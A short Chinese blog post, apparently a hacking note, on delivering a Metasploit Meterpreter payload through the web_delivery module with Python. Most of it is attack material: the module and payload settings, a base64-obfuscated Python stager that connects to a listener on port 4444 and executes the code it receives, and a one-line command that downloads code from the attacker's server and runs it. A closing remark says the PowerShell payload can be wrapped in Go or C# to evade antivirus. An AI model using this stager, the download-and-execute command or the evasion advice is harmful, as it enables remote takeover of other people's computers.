Pyhton加载Meterpreter Web_delivery代码

Webdelivery的options
Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH /test no The URI to use for this exploit (default is random)


Payload options (python/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 127.0.0.1 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Python

生成的文件内容
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMjcuMC4wLjEnLDQ0NDQpKQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

调用命令
python -c "import urllib2; r = urllib2.urlopen('http://127.0.0.1:8080/test'); exec(r.read());"

使用PowerShell执行的payload语句可以封装到golang或者C#中实现免杀的目的

你可能感兴趣的:(黑客帝国)